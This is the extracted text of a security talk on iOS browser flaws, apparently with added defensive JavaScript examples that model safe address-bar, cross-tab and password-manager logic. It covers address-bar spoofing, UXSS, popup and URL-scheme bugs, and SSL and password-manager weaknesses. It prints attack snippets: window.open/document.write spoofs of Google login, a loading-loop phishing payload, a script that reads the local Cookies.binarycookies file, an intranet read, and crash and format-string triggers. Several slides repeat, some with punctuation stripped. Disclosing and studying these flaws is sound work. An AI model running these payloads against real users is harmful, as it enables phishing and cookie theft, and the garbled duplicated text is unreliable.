Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Bolted-on by the browsersbull Address bar
bull Multiple tabs
bull Downloads
bull Support for untrusted SSL certificates
bull Autocomplete amp password manager
bull hellip and many more features (safety ratings malware protection cloud integration hellip)
UIWebView amp WKWebView
Testing
bull Inspiration from Browser Security Handbook
bull Retesting previous Mobile Safari bugs
bull ldquoBlack-boxrdquo testing from web perspective review of JavaScript code a bit of reversing debugging
bull Cross-browser test caseshttpsiosbrowsr-testscom
UIWebView amp WKWebView
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Address Bar Spoofing
Address Bar Spoofing
Address bar spoofing
Address Bar Spoofing
Look-alike
IDN etc
URL trackingdesynchronization
URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, ...)
• Most of them known for over 10 years (IE, Netscape)

Address Bar Spoofing: Untracked Content
Replace the window content with untracked content; document.write and/or data: URIs are usually good candidates.
• w = window.open('https://accounts.google.com'); setTimeout(function() { w.document.write(...) }, ...)
• CVE-2013-5152: Mobile Safari Address Bar Spoofing, reported in iOS 5.1.1, fixed in iOS 7

Address Bar Spoofing: Init & Interrupt
Initialise the window with the target URL, then replace it with phishing content before it loads.
• w = window.open('https://accounts.google.com'); w.document.write(...)
Optionally fall back to the native window.open:
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(...)
• CVE-2013-6895: Kaspersky Safe Browser
• CVE-2013-6898: F-Secure Safe Browser
• CVE-2013-6897: Dolphin Browser
• ... and 45% of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)

Address Bar Spoofing: Failed Navigation
An incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN - host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing the error alerts

Address Bar Spoofing: Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with a filtered port 443...
• ...or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443'; setInterval(function() { location = 'https://accounts.google.com:8443' }, ...)

Phishing page / Title bar
<title>https://www.apple.com</title>

Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying the SSL lock makes sense only if there was an actual, successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
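The address bar tips, as an added example that is not code from the slides or from any of the browsers they discuss: an address-bar model driven by events named after the UIWebViewDelegate callbacks, rendering the committed document (hardened) beside the requested URL (the behaviour the failed-navigation and loading-loop spoofs rely on). All hosts and navigation sequences are constructed.

```javascript
// Added example (not code from the slides or from any browser they discuss):
// an address-bar model that follows the "address bar tips" above. Event names
// mirror the UIWebViewDelegate callbacks; every navigation below is constructed.

class AddressBar {
  constructor() {
    this.committedURL = 'about:blank';  // document actually on screen
    this.pendingURL = null;             // navigation started, not yet committed
    this.lastRequested = 'about:blank'; // what a naive bar would show
    this.secure = false;                // SSL lock state
  }

  // webView:shouldStartLoadWithRequest: -- only record the pending request.
  shouldStartLoad(url) {
    this.pendingURL = url;
    this.lastRequested = url;
    return true;
  }

  // webViewDidFinishLoad: -- commit the URL the web view reports as loaded
  // (webView.request.mainDocumentURL), not the one that was requested. The
  // lock is shown only for an https document whose certificate chain validated.
  didFinishLoad(loadedURL, tlsValidated) {
    this.committedURL = loadedURL;
    this.lastRequested = loadedURL;
    this.pendingURL = null;
    this.secure = loadedURL.startsWith('https://') && tlsValidated === true;
  }

  // webView:didFailLoadWithError: -- forget the pending URL so the bar falls
  // back to the document that is still displayed.
  didFailLoad() {
    this.pendingURL = null;
  }

  // Hardened rendering: always the committed document.
  display() {
    return { url: this.committedURL, lock: this.secure, loading: this.pendingURL !== null };
  }

  // Weak rendering, for contrast: shows the requested URL as soon as navigation
  // starts, keeps it after a failure, and infers the lock from the scheme. The
  // failed-navigation and loading-loop spoofs depend on exactly this.
  naiveDisplay() {
    return { url: this.lastRequested, lock: this.lastRequested.startsWith('https://') };
  }
}

// Replays constructed delegate events and returns both renderings.
function replay(events) {
  const bar = new AddressBar();
  for (const e of events) {
    if (e.type === 'start') bar.shouldStartLoad(e.url);
    else if (e.type === 'finish') bar.didFinishLoad(e.url, e.tls);
    else if (e.type === 'fail') bar.didFailLoad();
    else throw new Error('unknown event ' + e.type);
  }
  return { safe: bar.display(), naive: bar.naiveDisplay() };
}

// Failed navigation: a phishing page is displayed, then a navigation to a host
// that does not resolve is started and fails.
const FAILED_NAVIGATION = [
  { type: 'finish', url: 'http://phish.example/', tls: false },
  { type: 'start', url: 'https://login.target.tld/' },
  { type: 'fail' },
];

// Loading loop: a navigation to a filtered port never completes.
const LOADING_LOOP = [
  { type: 'finish', url: 'http://phish.example/', tls: false },
  { type: 'start', url: 'https://login.target.tld:8443/' },
];

// A genuine https load with a valid chain, and one with a self-signed cert.
const VALID_TLS = [
  { type: 'start', url: 'https://www.target.tld/' },
  { type: 'finish', url: 'https://www.target.tld/', tls: true },
];
const SELF_SIGNED = [
  { type: 'start', url: 'https://selfsigned.example/' },
  { type: 'finish', url: 'https://selfsigned.example/', tls: false },
];
```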
UXSS: Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website. (~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007.

• CVE-2013-6893: UXSS in Mercury Browser for iOS
• CVE-2013-7197: UXSS in Yandex.Browser for iOS
• CVE-2012-2899: UXSS in Google Chrome for iOS
• ...

CVE-2013-6893: UXSS in Mercury Browser
w = window.open('about:blank')
  -> mbexec://$(WINDOW_ID)/[ "command": "window.open", "target": 1234, "url": "about:blank" ]   (target id from Math.random())
  -> [webView loadRequest: ... "about:blank" ...]
Cross-frame forgery:
w.document.write('Hi')
  -> mbexec://$(WINDOW_ID)/[ "command": "window.document.write", "target": 1234, "html": "Hi" ]
  -> [webView stringByEvaluatingJavaScriptFromString:@"document.write('Hi')"]

Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.
w = window.open('https://accounts.google.com'); w.document.write('<script src=...></script>')
...and it just works in accounts.google.com.

CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() -> UXSS
Bug Bounty :-)

CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(...)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"..." baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and to local files.
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>')
• applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:@"Hi" baseURL:[NSURL ... @"about:blank"]]
• iOS 8: use WKWebView.UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
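The three bugs above differ only in where the origin check sits: nowhere (Mercury), at open time but not at write time (Yandex.Browser), or with about:blank mapped to a "no URL" applewebdata:// context (Chrome). As an added example that is not code from the slides or from any of these browsers, a cross-tab bridge that resolves about:blank to the opener's origin and re-checks the target tab's current document at write time; tab objects, URLs and the `mbexec`-style command names are constructed for the example.

```javascript
// Added example (not code from the slides or from Mercury, Yandex.Browser or
// Chrome): same-origin enforcement for a bolted-on cross-tab window.open /
// document.write bridge. Tabs and URLs are constructed for the example.

// Same-origin policy origin: scheme + host + port. The URL API returns the
// string 'null' for opaque origins (about:blank, file:, data:, applewebdata:).
function originOf(urlString) {
  return new URL(urlString).origin;
}

class Tab {
  constructor(id, url, openerOrigin = null) {
    this.id = id;
    this.url = url;                   // current document URL
    this.openerOrigin = openerOrigin; // origin of the tab that opened this one
    this.html = '';
  }

  // Origin of the tab's current document, or null if it is opaque.
  effectiveOrigin() {
    // about:blank inherits the opener's origin. Treating it as "no URL" and
    // loading it with baseURL:nil is what produced the applewebdata:// origin.
    if (this.url === 'about:blank') return this.openerOrigin;
    const o = originOf(this.url);
    // file:, data: and applewebdata: documents are never scriptable cross-tab.
    return o === 'null' ? null : o;
  }
}

class TabBridge {
  constructor() {
    this.tabs = new Map();
    this.nextId = 1;
    this.blocked = []; // audit trail of refused writes
  }

  // command: window.open, issued from `caller`.
  open(caller, url) {
    const target = new Tab(this.nextId++, url, caller.effectiveOrigin());
    this.tabs.set(target.id, target);
    return target.id;
  }

  // The child tab navigates after it was opened (redirect, meta refresh, ...).
  navigate(targetId, url) {
    this.tabs.get(targetId).url = url;
  }

  // command: window.document.write, issued from `caller` into `targetId`.
  // The check happens here, at write time, against the target's *current*
  // document; a check done only at open time is bypassed by navigate().
  write(caller, targetId, html) {
    const target = this.tabs.get(targetId);
    if (!target) return false;
    const from = caller.effectiveOrigin();
    const into = target.effectiveOrigin();
    if (from === null || into === null || from !== into) {
      this.blocked.push({ from, into, targetId });
      return false;
    }
    target.html += html;
    return true;
  }
}

// Replays the three bug patterns from the slides against the hardened bridge.
function runScenarios() {
  const bridge = new TabBridge();
  const page = new Tab(0, 'http://attacker.example/'); // constructed opener
  // Mercury pattern: write straight into a cross-origin tab.
  const t1 = bridge.open(page, 'https://login.target.tld/');
  const mercury = bridge.write(page, t1, '<script src="..."></script>');
  // Yandex pattern: same-origin at open time, redirected before the write.
  const t2 = bridge.open(page, 'http://attacker.example/child.html');
  bridge.navigate(t2, 'https://login.target.tld/');
  const yandex = bridge.write(page, t2, 'Hi');
  // Chrome pattern: about:blank child; allowed, but it stays in the opener's origin.
  const t3 = bridge.open(page, 'about:blank');
  const chrome = bridge.write(page, t3, 'Hi');
  // Legitimate same-origin popup.
  const t4 = bridge.open(page, 'http://attacker.example/popup.html');
  const legit = bridge.write(page, t4, 'Hi');
  return { mercury, yandex, chrome, legit, blankOrigin: bridge.tabs.get(t3).effectiveOrigin() };
}
```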
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] -> nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) -> NULL
• Downloads opened directly from file://

Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5): CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain -> HTML (iOS < 7): CVE-2013-5151, Ben Toews
• application/octet-stream -> HTML
• application/other with a filename ending in .html

JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file://' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest(); x.open('GET', path, false); x.send();
  alert(x.responseText);
}
</script>

<script>
x = new XMLHttpRequest(); x.open('GET', 'https://your.intranet/', false); x.send();
alert(x.responseText);
</script>

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
Popups & URL handling
Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway...

URI schemes
• Native (WebKit)
• Application (bolted-on)
  scheme://download/https://secure.tld/victim/data vs. scheme://download/http://attacker.tld/README.html
  scheme://add-filter?url=...
• Bridge (internal)
• Registered (external)

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a null pointer dereference
• Tested with percent encoding: http:%, http:%5, http:%5c etc.
• Example, Opera Coast: <script>document.location = 'http:%5c'</script>

Opera Coast:
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p...">
SSL & password managers
SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14% of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript with the privileges of the top frame -> passwords are not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain, but not always the URL scheme (https vs http)
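The password-manager findings above, as an added example that is not code from the slides or from any tested browser: fill and save decisions for a manager bolted onto a WebView browser, with host-only matching (what the deck found) beside full-origin, top-frame-only matching, and a save rule that refuses credentials a document tries to plant for another origin. Stored entries, frames and hosts are constructed.

```javascript
// Added example (not code from the slides or from any browser they tested):
// fill and save decisions for a password manager bolted onto a WebView-based
// browser. Entries, frames and hosts below are constructed inputs.

const originOf = (url) => new URL(url).origin; // scheme + host + port

class PasswordManager {
  constructor() {
    this.byOrigin = new Map(); // 'https://www.target.tld' -> { user, password }
  }

  // Save only credentials the top-level document submitted to its own origin;
  // a subframe, or a form posting elsewhere, must not be able to plant an
  // entry for another site.
  save(frame, formAction, creds) {
    if (!frame.isTop) return false;
    const docOrigin = originOf(frame.url);
    if (originOf(formAction) !== docOrigin) return false;
    this.byOrigin.set(docOrigin, creds);
    return true;
  }

  // Weak matching (seen in some tested browsers): host only, so an entry saved
  // on https://www.target.tld is also offered to http://www.target.tld.
  fillByHost(frame) {
    const host = new URL(frame.url).hostname;
    for (const [origin, creds] of this.byOrigin) {
      if (new URL(origin).hostname === host) return creds;
    }
    return null;
  }

  // Hardened matching: top frame only, and scheme, host and port must all match.
  fill(frame) {
    if (!frame.isTop) return null;
    return this.byOrigin.get(originOf(frame.url)) || null;
  }
}

// Exercises both policies on constructed frames and returns the decisions.
function demo() {
  const pm = new PasswordManager();
  const creds = { user: 'alice', password: 'constructed-secret' };
  const top = { isTop: true, url: 'https://www.target.tld/login' };
  const saved = pm.save(top, 'https://www.target.tld/session', creds);
  // A document on another origin posting to target.tld: refused.
  const planted = pm.save({ isTop: true, url: 'http://attacker.example/' },
                          'https://www.target.tld/session', { user: 'x', password: 'y' });
  const downgrade = { isTop: true, url: 'http://www.target.tld/login' };
  const subframe = { isTop: false, url: 'https://www.target.tld/login' };
  return {
    saved,
    planted,
    weakOnHttp: pm.fillByHost(downgrade) !== null,
    hardenedOnHttp: pm.fill(downgrade) !== null,
    hardenedOnHttps: pm.fill(top) !== null,
    hardenedInSubframe: pm.fill(subframe) !== null,
  };
}
```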
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects, built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec
• http://www.w3.org/TR/CSP
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews
• http://www.shmoo.com/idn
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com
• https://iosbrowsr-tests.com

Questions?
lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu
Thank you
Testing
• Inspiration from the Browser Security Handbook
• Retesting previous Mobile Safari bugs
• "Black-box" testing from the web perspective, review of JavaScript code, a bit of reversing/debugging
• Cross-browser test cases: https://iosbrowsr-tests.com
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address Bar Spoofing

Address bar spoofing
• Look-alike (IDN etc.)
• URL tracking desynchronization

URL tracking desynchronization
• Navigate to untracked content
• Initiate navigation, interrupt, overwrite content
• Failed navigation
• Loading loop
• Lots of other methods (race conditions, history, …)
• Most of them known for over 10 years (IE, Netscape)
Untracked Content
Replace window content with untracked content. document.write and/or data: URIs are usually good candidates.
• w = window.open('https://accounts.google.com'); setTimeout(function(){ w.document.write(…) }, …)
• CVE-2013-5152 Mobile Safari Address Bar Spoofing, reported in iOS 5.1.1, fixed in iOS 7
Init & Interrupt
Initialise a window with the target URL, replace it with phishing content before it loads.
• w = window.open('https://accounts.google.com'); w.document.write(…)
Optionally fall back to the native window.open:
• delete window.open; w = window.open('https://accounts.google.com'); w.document.write(…)

Init & Interrupt
• CVE-2013-6895 Kaspersky Safe Browser
• CVE-2013-6898 F-Secure Safe Browser
• CVE-2013-6897 Dolphin Browser
• … and 45 of the tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Failed Navigation
An incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN - host not found (https://login.target.tld)
• TCP port closed (https://www.target.tld:448)
• SSL errors (https://target.tld)
• Display phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing error alerts
Loading loop
• HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL

Loading loop
• document.write("Phishing page here"); location = "https://accounts.google.com:8443"; setInterval(function(){ location = "https://accounts.google.com:8443" }, …)
Title bar
• Phishing page with <title>https://www.apple.com</title>: the title bar shows whatever URL-looking string the page chose (screenshot)
Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying the SSL lock makes sense only if there was an actual successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView URL property
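The address-bar model below is an added example, not code from the slides or from any of the browsers tested. It applies the four tips above to a small state machine for a UIWebView/WKWebView-based browser app: the displayed text comes only from the URL the web view reports as loaded, a navigation in flight is shown as pending rather than as the current location, the failure callback updates the bar too, and the lock appears only after a finished https load. Method names mirror the UIWebViewDelegate callbacks; the AddressBar class and every URL are constructed for the example.

```javascript
// Added example (not from the slides): address-bar state derived only from
// navigation events the web view actually reported.

class AddressBar {
  constructor() {
    this.committed = '';      // URL of the document the web view has actually loaded
    this.provisional = null;  // URL of a navigation that was requested but not yet loaded
    this.secure = false;      // lock icon: only after a finished https load
  }

  // webView:shouldStartLoadWithRequest:navigationType: / webViewDidStartLoad:
  didStartLoad(requestedUrl) {
    this.provisional = requestedUrl;
    this.secure = false;      // a navigation in flight never earns the lock
  }

  // webViewDidFinishLoad: take the URL from the web view's own request,
  // never from the URL the app believed it was navigating to.
  didFinishLoad(loadedUrl) {
    this.committed = loadedUrl;
    this.provisional = null;
    this.secure = loadedUrl.startsWith('https://');
  }

  // webView:didFailLoadWithError: NXDOMAIN, closed port, TLS error and the
  // 1-10 minute timeout all end here; the unreached target must not stay in the bar.
  didFailLoad() {
    this.provisional = null;
    this.secure = this.committed.startsWith('https://');
  }

  // What the user sees: the loaded document's URL, the lock state, and the
  // pending navigation as a separate progress indicator, never as the location.
  display() {
    return { text: this.committed, lock: this.secure, pending: this.provisional };
  }
}

// Replays the "Loading loop" slide against the model: an attacker page loads,
// writes its content, then navigates to a filtered port that never answers.
// All URLs are constructed sample values.
function loadingLoopScenario() {
  const bar = new AddressBar();
  bar.didStartLoad('http://attacker.example/');
  bar.didFinishLoad('http://attacker.example/');
  const duringPhishingPage = bar.display();
  bar.didStartLoad('https://accounts.google.com:8443/');
  const whilePending = bar.display();
  bar.didFailLoad();                             // timeout reported by the web view
  const afterTimeout = bar.display();
  return { duringPhishingPage, whilePending, afterTimeout };
}

// A genuine, finished https load is the only way to obtain the lock.
function httpsScenario() {
  const bar = new AddressBar();
  bar.didStartLoad('https://www.example.com/');
  bar.didFinishLoad('https://www.example.com/');
  return bar.display();
}
```

With this model the "failed navigation" and "loading loop" slides lose their effect: the bar keeps showing the attacker's page as the location while the spoofed request is pending, and returns to it when the web view reports the failure.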
UXSS: Universal Cross-Site Scripting

Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website. (~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007
Universal Cross-Site Scripting
• CVE-2013-6893 UXSS in Mercury Browser for iOS
